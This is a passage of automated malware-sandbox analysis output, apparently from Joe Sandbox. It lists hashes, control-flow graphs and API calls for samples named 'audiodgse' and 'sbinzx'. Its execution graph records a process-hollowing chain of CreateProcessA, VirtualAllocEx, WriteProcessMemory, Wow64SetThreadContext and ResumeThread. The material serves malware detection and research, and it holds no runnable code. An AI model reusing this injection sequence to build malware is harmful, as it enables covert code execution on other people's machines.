                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: ba9803eb4b1fda299a69356855aefebe809b631f3e44fab57ba5c85b6f33a71f
                                                                                • Instruction ID: 98c1d223bce1068bc87e65cbee7dcfb13308250fda54485ee67f0895a45cee3a
                                                                                • Opcode Fuzzy Hash: ba9803eb4b1fda299a69356855aefebe809b631f3e44fab57ba5c85b6f33a71f
                                                                                • Instruction Fuzzy Hash: 3221E4B5D002099FDB10CF9AD984ADEBBF5EB48320F14852AE918A3350D375A941CF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 781 22ca270-22cb3a0 783 22cb3a8-22cb3d7 LoadLibraryExW 781->783 784 22cb3a2-22cb3a5 781->784 785 22cb3d9-22cb3df 783->785 786 22cb3e0-22cb3fd 783->786 784->783 785->786
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022CB1B9,00000800,00000000,00000000), ref: 022CB3CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 678972e3784f042d1b9c5ca5095376f83fbdc1d4fbf7a65e56df1423ada41dd3
                                                                                • Instruction ID: 95cf71e150acb8fe6bdc8866426456a6e287fc66bd360de684bf3df0aad8b295
                                                                                • Opcode Fuzzy Hash: 678972e3784f042d1b9c5ca5095376f83fbdc1d4fbf7a65e56df1423ada41dd3
                                                                                • Instruction Fuzzy Hash: F71114B6D103499FDB20DF9AC445B9EFBF8EB88314F20852ED919A7200C379A545CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 789 22cb358-22cb3a0 790 22cb3a8-22cb3d7 LoadLibraryExW 789->790 791 22cb3a2-22cb3a5 789->791 792 22cb3d9-22cb3df 790->792 793 22cb3e0-22cb3fd 790->793 791->790 792->793
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022CB1B9,00000800,00000000,00000000), ref: 022CB3CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 46ea7368d427a46ccbd1dceab276e8fd6d6b3de8537404e59811dd5369761cc7
                                                                                • Instruction ID: 07a29562e3de341428361dd1afcdcd144676de9e1e1bdbcf2b124a4e1b6d841d
                                                                                • Opcode Fuzzy Hash: 46ea7368d427a46ccbd1dceab276e8fd6d6b3de8537404e59811dd5369761cc7
                                                                                • Instruction Fuzzy Hash: 411103B6C003498FDB20CF9AD885ADEFBF4EB88314F10852ED519A7200C779A546CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 796 22cb0d8-22cb118 797 22cb11a-22cb11d 796->797 798 22cb120-22cb14b GetModuleHandleW 796->798 797->798 799 22cb14d-22cb153 798->799 800 22cb154-22cb168 798->800 799->800
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 022CB13E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: c656900ba60e9666b772c7c859e852736c57d3a91314dbe02f98529ca5f8d41f
                                                                                • Instruction ID: 47845eafa2380cd5bc53265d06923ffd71ca6197fb5285198e3e147fc7e415a9
                                                                                • Opcode Fuzzy Hash: c656900ba60e9666b772c7c859e852736c57d3a91314dbe02f98529ca5f8d41f
                                                                                • Instruction Fuzzy Hash: 2611D2B5C006498FDB10DF9AD845B9EFBF5EB48314F10851AD419A7314C375A545CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 802 22cb401-22cb408 803 22cb3aa-22cb3d7 LoadLibraryExW 802->803 804 22cb40a-22cb41d 802->804 805 22cb3d9-22cb3df 803->805 806 22cb3e0-22cb3fd 803->806 808 22cb41f-22cb423 804->808 809 22cb424-22cb430 804->809 805->806 813 22cb43a-22cb44f call 22ca228 809->813 814 22cb432-22cb439 809->814
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022CB1B9,00000800,00000000,00000000), ref: 022CB3CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 3a0c27ae3370e1c0554d1671676ddcf70f07ba00913fb62ac651fee294409cda
                                                                                • Instruction ID: a1ad1df728a8a47d49ffc2e71e4c575c03c15a4d6f27d6121a6fa2e8d3ba8073
                                                                                • Opcode Fuzzy Hash: 3a0c27ae3370e1c0554d1671676ddcf70f07ba00913fb62ac651fee294409cda
                                                                                • Instruction Fuzzy Hash: EA01DFB69043858FEB209BE8D4057DABBF0AF84328F14855ED149EB650C3399406CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1268948574.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ad000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d5a1cc52495b150c5b52cfed7bca8539896d5505c431562f7e51b8d426e550f0
                                                                                • Instruction ID: 0dcfb856e5ef4371a56972021a8355a77bb4e9f3e6753d6051b496994bfb7a7f
                                                                                • Opcode Fuzzy Hash: d5a1cc52495b150c5b52cfed7bca8539896d5505c431562f7e51b8d426e550f0
                                                                                • Instruction Fuzzy Hash: BE2106B2504200DFDB25DF10D9C4B26BB65FBC9310F20C669E9460B686C33ADC16CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1268948574.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ad000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 35f235c085e739bf59c67d2ab23f27e70fb203b9a657fd11133e675da25054f2
                                                                                • Instruction ID: a59ec33f1a911a7f5e8cd4da99983646e2a5c7f6fa8122bdf2512d738d62593b
                                                                                • Opcode Fuzzy Hash: 35f235c085e739bf59c67d2ab23f27e70fb203b9a657fd11133e675da25054f2
                                                                                • Instruction Fuzzy Hash: 2E214871904240DFDB24DF10D9C0B26BF61FBC8318F20C669E8060B656C33ADC26CBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269023581.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7bd000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0c8264c6af73775fc6003a7779c7e6528f6b80dbe7debd2530e632f10eb606b3
                                                                                • Instruction ID: 28b81da5a859c12bf580f511a9934d91b374691498c2782f73d42c3cfae75d02
                                                                                • Opcode Fuzzy Hash: 0c8264c6af73775fc6003a7779c7e6528f6b80dbe7debd2530e632f10eb606b3
                                                                                • Instruction Fuzzy Hash: DF21F275604304DFDB24EF14D9C4B56BB65EB88324F24C5ADE84A4B286D33ADC47CA62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269023581.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7bd000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f01bd24408bf912d7939c0be2e70fe9f3fe9d1faeef71a6a38a376c320ad2cbb
                                                                                • Instruction ID: 1a13851f61af228b09c3c1e5464540aa4600b84c93b9ae947865589ec7f6c794
                                                                                • Opcode Fuzzy Hash: f01bd24408bf912d7939c0be2e70fe9f3fe9d1faeef71a6a38a376c320ad2cbb
                                                                                • Instruction Fuzzy Hash: 5A213771A04344DFDB24DF10D9C4B95BB61FB84314F20C56DD8094B282D33ADC06CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1268948574.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ad000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                                                • Instruction ID: c6263f49ad5c3966aa62564547d9e184db38098a407b0903960473b16d2098b9
                                                                                • Opcode Fuzzy Hash: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                                                • Instruction Fuzzy Hash: 8D21B176504240DFCB16CF50D9C4B56BF72FB89324F24C6A9DC490B696C33AD826CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1268948574.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ad000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                • Instruction ID: 81f36d6f609b4cda42e20ea741fff7759f0367d91c9e7a9b13da40470b6c2f2e
                                                                                • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                • Instruction Fuzzy Hash: CC11E676904280CFCB15CF14D5C4B16BF72FBD4324F24C6A9D84A0B656C33AD966CBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269023581.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7bd000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                • Instruction ID: 2c5842ec8d0637410a230b4169c2b9a5de646dc2aee9835171fe79a6f0b32b24
                                                                                • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                • Instruction Fuzzy Hash: 5911BB75504280DFCB15CF10C5C4B95BBA2FB84324F24C6ADD8494B296C33AD80ACB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269023581.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7bd000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                • Instruction ID: 1160e69b8eaca1e1513b820f02edece1d133ceb197dc4f8abc47b4df02fdeb7a
                                                                                • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                • Instruction Fuzzy Hash: E711BE75504280CFCB15DF14D5C4B55BB62FB44314F24C6A9D8494B656C33AD80ACB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1268948574.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ad000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eae745d000d502881be7945952be3e45314318c8ac08d939c6052f8cd51f69e5
                                                                                • Instruction ID: a5574216942ad34b33ac43415da45e2e721d692d4e5077a58609ab7b985c465e
                                                                                • Opcode Fuzzy Hash: eae745d000d502881be7945952be3e45314318c8ac08d939c6052f8cd51f69e5
                                                                                • Instruction Fuzzy Hash: E50126310083409EE7345E21CCC4B27BF98DF82325F18C62AED0A0F682C63D9C45CAB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1268948574.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ad000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2ac57f7b697a1c393157fd7e69ec55c0d2ef8136c902b83c589c925d5bd15f93
                                                                                • Instruction ID: df5d1827ff162a03cc19d59c74261567c4865494f667e0836cbd0a2513580d07
                                                                                • Opcode Fuzzy Hash: 2ac57f7b697a1c393157fd7e69ec55c0d2ef8136c902b83c589c925d5bd15f93
                                                                                • Instruction Fuzzy Hash: D4F0F071004340AEE7248E16CC88B63FF98EB92334F18C15EED090B296C279AC44CBB1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7fda60ecb5008176f0ae96215ca2f2b2c9319b4b4dfac90dc0116a11ab11f6d4
                                                                                • Instruction ID: 7dcd503c0393870ae03b4690d9f683a0cbb425829853087f6e5b308af071fd6f
                                                                                • Opcode Fuzzy Hash: 7fda60ecb5008176f0ae96215ca2f2b2c9319b4b4dfac90dc0116a11ab11f6d4
                                                                                • Instruction Fuzzy Hash: CBA16D36E102059FCF19DFA4C9405DEBBB3FF85304B25826AE801AB659DB75E916CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:11.1%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:208
                                                                                Total number of Limit Nodes:10
                                                                                execution_graph 24706 270cfe0 24707 270cfe4 24706->24707 24711 270d5c8 24707->24711 24714 270d5b8 24707->24714 24708 270d113 24717 270d21c 24711->24717 24715 270d5f6 24714->24715 24716 270d21c DuplicateHandle 24714->24716 24715->24708 24716->24715 24718 270d630 DuplicateHandle 24717->24718 24720 270d5f6 24718->24720 24720->24708 24742 270ac50 24746 270ad48 24742->24746 24754 270ad38 24742->24754 24743 270ac5f 24747 270ad59 24746->24747 24748 270ad7c 24746->24748 24747->24748 24762 270afe0 24747->24762 24766 270afd0 24747->24766 24748->24743 24749 270ad74 24749->24748 24750 270af80 GetModuleHandleW 24749->24750 24751 270afad 24750->24751 24751->24743 24755 270ad59 24754->24755 24756 270ad7c 24754->24756 24755->24756 24760 270afe0 LoadLibraryExW 24755->24760 24761 270afd0 LoadLibraryExW 24755->24761 24756->24743 24757 270ad74 24757->24756 24758 270af80 GetModuleHandleW 24757->24758 24759 270afad 24758->24759 24759->24743 24760->24757 24761->24757 24763 270aff4 24762->24763 24764 270b019 24763->24764 24770 270a0d0 24763->24770 24764->24749 24767 270afe0 24766->24767 24768 270a0d0 LoadLibraryExW 24767->24768 24769 270b019 24767->24769 24768->24769 24769->24749 24771 270b1c0 LoadLibraryExW 24770->24771 24773 270b239 24771->24773 24773->24764 24774 6ddab3f 24775 6ddab64 24774->24775 24776 6ddab5a 24774->24776 24779 6ddab80 24776->24779 24784 6ddab70 24776->24784 24780 6ddab8e 24779->24780 24783 6ddabad 24779->24783 24789 6dda43c 24780->24789 24783->24775 24785 6ddab7e 24784->24785 24788 6ddabf6 24784->24788 24786 6dda43c FindCloseChangeNotification 24785->24786 24787 6ddaba9 24786->24787 24787->24775 24790 6ddacf8 FindCloseChangeNotification 24789->24790 24791 6ddaba9 24790->24791 24791->24775 24792 6ddb178 24794 6ddb17c 24792->24794 24793 6ddb1a0 24794->24793 24797 6ddb1cb 24794->24797 24802 6ddb1e0 24794->24802 24798 6ddb1cc 24797->24798 24801 6ddb218 24798->24801 24807 6dda484 24798->24807 24801->24793 24803 6ddb1ee 24802->24803 24806 6ddb20c 24802->24806 24804 6dda484 FindCloseChangeNotification 24803->24804 24805 6ddb208 24804->24805 24805->24793 24806->24793 24808 6ddacf8 FindCloseChangeNotification 24807->24808 24809 6ddad5f 24808->24809 24809->24793 24815 6dd9ae8 24816 6dd9c73 24815->24816 24817 6dd9b0e 24815->24817 24817->24816 24819 6dd9d68 PostMessageW 24817->24819 24820 6dd9dd4 24819->24820 24820->24817 24551 6dd8d15 24552 6dd8c55 24551->24552 24554 6dd8b99 24551->24554 24553 6dd8bd6 24553->24552 24563 6dd8e78 24553->24563 24568 6dd8e68 24553->24568 24573 6dd8e30 24553->24573 24578 6dd8dca 24553->24578 24554->24553 24559 6dd8e78 16 API calls 24554->24559 24560 6dd8e68 16 API calls 24554->24560 24561 6dd8dca 16 API calls 24554->24561 24562 6dd8e30 16 API calls 24554->24562 24559->24554 24560->24554 24561->24554 24562->24554 24564 6dd8e96 24563->24564 24565 6dd8e8b 24564->24565 24584 6dd913d 24564->24584 24604 6dd9316 24564->24604 24565->24552 24569 6dd8e6a 24568->24569 24570 6dd8e8b 24569->24570 24571 6dd913d 14 API calls 24569->24571 24572 6dd9316 14 API calls 24569->24572 24570->24552 24571->24570 24572->24570 24574 6dd8df7 24573->24574 24574->24552 24575 6dd8df9 24574->24575 24576 6dd913d 14 API calls 24574->24576 24577 6dd9316 14 API calls 24574->24577 24575->24552 24576->24575 24577->24575 24579 6dd8dce 24578->24579 24581 6dd8e3f 24578->24581 24579->24552 24580 6dd8e8b 24580->24552 24581->24552 24581->24580 24582 6dd913d 14 API calls 24581->24582 24583 6dd9316 14 API calls 24581->24583 24582->24580 24583->24580 24625 6dd87f4 24584->24625 24629 6dd8800 24584->24629 24585 6dd9183 24586 6dd9430 24585->24586 24587 6dd91f0 24585->24587 24588 6dd8178 Wow64SetThreadContext 24585->24588 24589 6dd8180 Wow64SetThreadContext 24585->24589 24586->24565 24587->24586 24590 6dd8178 Wow64SetThreadContext 24587->24590 24591 6dd8180 Wow64SetThreadContext 24587->24591 24592 6dd8318 WriteProcessMemory 24587->24592 24593 6dd8308 WriteProcessMemory 24587->24593 24594 6dd8570 WriteProcessMemory 24587->24594 24595 6dd80c8 ResumeThread 24587->24595 24596 6dd6fe4 ResumeThread 24587->24596 24597 6dd7f94 ResumeThread 24587->24597 24598 6dd8097 ResumeThread 24587->24598 24599 6dd80d0 ResumeThread 24587->24599 24600 6dd8668 ReadProcessMemory 24587->24600 24601 6dd8662 ReadProcessMemory 24587->24601 24588->24587 24589->24587 24590->24587 24591->24587 24592->24587 24593->24587 24594->24587 24595->24587 24596->24587 24597->24587 24598->24587 24599->24587 24600->24587 24601->24587 24633 6dd8258 24604->24633 24637 6dd8251 24604->24637 24605 6dd9338 24606 6dd9430 24605->24606 24641 6dd8308 24605->24641 24646 6dd8570 24605->24646 24650 6dd8318 24605->24650 24606->24565 24607 6dd921f 24607->24606 24622 6dd8318 WriteProcessMemory 24607->24622 24623 6dd8308 WriteProcessMemory 24607->24623 24624 6dd8570 WriteProcessMemory 24607->24624 24655 6dd8178 24607->24655 24659 6dd8180 24607->24659 24663 6dd8662 24607->24663 24667 6dd8668 24607->24667 24671 6dd80c8 24607->24671 24675 6dd7f94 24607->24675 24679 6dd80d0 24607->24679 24683 6dd8097 24607->24683 24687 6dd6fe4 24607->24687 24622->24607 24623->24607 24624->24607 24626 6dd8800 CreateProcessA 24625->24626 24628 6dd8a4b 24626->24628 24630 6dd8889 CreateProcessA 24629->24630 24632 6dd8a4b 24630->24632 24632->24632 24634 6dd8298 VirtualAllocEx 24633->24634 24636 6dd82d5 24634->24636 24636->24605 24638 6dd8298 VirtualAllocEx 24637->24638 24640 6dd82d5 24638->24640 24640->24605 24642 6dd834c 24641->24642 24643 6dd85e6 WriteProcessMemory 24642->24643 24645 6dd839f 24642->24645 24644 6dd8617 24643->24644 24644->24607 24645->24607 24647 6dd85c0 WriteProcessMemory 24646->24647 24649 6dd8617 24647->24649 24649->24607 24652 6dd834c 24650->24652 24651 6dd839f 24651->24607 24652->24651 24653 6dd85e6 WriteProcessMemory 24652->24653 24654 6dd8617 24653->24654 24654->24607 24656 6dd81c5 Wow64SetThreadContext 24655->24656 24658 6dd820d 24656->24658 24658->24607 24660 6dd81c5 Wow64SetThreadContext 24659->24660 24662 6dd820d 24660->24662 24662->24607 24664 6dd86b3 ReadProcessMemory 24663->24664 24666 6dd86f7 24664->24666 24666->24607 24668 6dd86b3 ReadProcessMemory 24667->24668 24670 6dd86f7 24668->24670 24670->24607 24672 6dd8087 24671->24672 24672->24671 24673 6dd811a ResumeThread 24672->24673 24674 6dd8141 24673->24674 24674->24607 24676 6dd7f9f ResumeThread 24675->24676 24678 6dd8141 24676->24678 24678->24607 24680 6dd8110 ResumeThread 24679->24680 24682 6dd8141 24680->24682 24682->24607 24684 6dd8087 ResumeThread 24683->24684 24686 6dd8141 24684->24686 24686->24607 24688 6dd7fa0 ResumeThread 24687->24688 24690 6dd8141 24688->24690 24690->24607 24721 2704668 24722 270467a 24721->24722 24723 2704686 24722->24723 24725 2704779 24722->24725 24726 270479d 24725->24726 24730 2704888 24726->24730 24734 2704879 24726->24734 24727 27047a7 24727->24723 24731 27048af 24730->24731 24732 270498c 24731->24732 24738 27044c4 24731->24738 24732->24727 24735 27048af 24734->24735 24736 27044c4 CreateActCtxA 24735->24736 24737 270498c 24735->24737 24736->24737 24737->24727 24739 2705918 CreateActCtxA 24738->24739 24741 27059db 24739->24741 24691 6dd5f91 24692 6dd5ec3 24691->24692 24693 6dd5f9a 24691->24693 24694 6dd5f32 24692->24694 24698 6dd7dd8 24692->24698 24702 6dd7dc8 24692->24702 24695 6dd5ee6 24699 6dd7dfc 24698->24699 24700 6dd6fe4 ResumeThread 24699->24700 24701 6dd7e16 24700->24701 24701->24695 24703 6dd7dfc 24702->24703 24704 6dd6fe4 ResumeThread 24703->24704 24705 6dd7e16 24704->24705 24705->24695 24810 6dd5f73 24811 6dd5f0b 24810->24811 24812 6dd61aa 24811->24812 24813 6dd7dd8 ResumeThread 24811->24813 24814 6dd7dc8 ResumeThread 24811->24814 24813->24812 24814->24812

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 657 6dd8318-6dd8346 658 6dd83ed-6dd83f0 657->658 659 6dd834c-6dd8362 657->659 660 6dd843c-6dd843f 658->660 661 6dd83f2-6dd83fa 658->661 662 6dd855d-6dd85c6 659->662 663 6dd8368-6dd8370 659->663 667 6dd8555-6dd855c 660->667 668 6dd8445-6dd845b 660->668 664 6dd83fc-6dd83fe 661->664 665 6dd8408-6dd842e 661->665 678 6dd85c8-6dd85d4 662->678 679 6dd85d6-6dd8615 WriteProcessMemory 662->679 663->662 666 6dd8376-6dd8386 663->666 664->665 665->662 685 6dd8434-6dd8437 665->685 666->662 669 6dd838c-6dd8399 666->669 668->662 671 6dd8461-6dd8469 668->671 669->662 672 6dd839f-6dd83b6 669->672 671->662 675 6dd846f-6dd847c 671->675 676 6dd83bd 672->676 677 6dd83b8-6dd83bb 672->677 675->662 680 6dd8482-6dd8492 675->680 681 6dd83bf-6dd83e8 676->681 677->681 678->679 688 6dd861e-6dd864e 679->688 689 6dd8617-6dd861d 679->689 680->662 683 6dd8498-6dd84b5 680->683 681->667 683->662 686 6dd84bb-6dd84c3 683->686 685->667 686->662 690 6dd84c9-6dd84d9 686->690 689->688 690->662 691 6dd84df-6dd84ec 690->691 691->662 692 6dd84ee-6dd8505 691->692 696 6dd850a-6dd8548 692->696 697 6dd8507 692->697 705 6dd854d 696->705 706 6dd854a 696->706 697->696 705->667 706->705
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD8608
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 9219febffb5038244577723fd4014907c1e960aaa38ed0ef803869da1e388d06
                                                                                • Instruction ID: a6e37c8f978ccc594c77e88d9954bbed8b1ee0bbfd4d520cc5cf0037edc1e501
                                                                                • Opcode Fuzzy Hash: 9219febffb5038244577723fd4014907c1e960aaa38ed0ef803869da1e388d06
                                                                                • Instruction Fuzzy Hash: 1FA1CC30A042658FDB46DF6DC88067EFBF2AF89310F548669E46A9B245C734EC41CBD4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 707 6dd87f4-6dd8895 710 6dd88ce-6dd88ee 707->710 711 6dd8897-6dd88a1 707->711 716 6dd8927-6dd8956 710->716 717 6dd88f0-6dd88fa 710->717 711->710 712 6dd88a3-6dd88a5 711->712 714 6dd88c8-6dd88cb 712->714 715 6dd88a7-6dd88b1 712->715 714->710 718 6dd88b5-6dd88c4 715->718 719 6dd88b3 715->719 727 6dd898f-6dd8a49 CreateProcessA 716->727 728 6dd8958-6dd8962 716->728 717->716 720 6dd88fc-6dd88fe 717->720 718->718 721 6dd88c6 718->721 719->718 722 6dd8921-6dd8924 720->722 723 6dd8900-6dd890a 720->723 721->714 722->716 725 6dd890c 723->725 726 6dd890e-6dd891d 723->726 725->726 726->726 729 6dd891f 726->729 739 6dd8a4b-6dd8a51 727->739 740 6dd8a52-6dd8ad8 727->740 728->727 730 6dd8964-6dd8966 728->730 729->722 732 6dd8989-6dd898c 730->732 733 6dd8968-6dd8972 730->733 732->727 734 6dd8974 733->734 735 6dd8976-6dd8985 733->735 734->735 735->735 736 6dd8987 735->736 736->732 739->740 750 6dd8ae8-6dd8aec 740->750 751 6dd8ada-6dd8ade 740->751 752 6dd8afc-6dd8b00 750->752 753 6dd8aee-6dd8af2 750->753 751->750 754 6dd8ae0 751->754 756 6dd8b10-6dd8b14 752->756 757 6dd8b02-6dd8b06 752->757 753->752 755 6dd8af4 753->755 754->750 755->752 759 6dd8b26-6dd8b2d 756->759 760 6dd8b16-6dd8b1c 756->760 757->756 758 6dd8b08 757->758 758->756 761 6dd8b2f-6dd8b3e 759->761 762 6dd8b44 759->762 760->759 761->762 763 6dd8b45 762->763 763->763
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD8A36
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
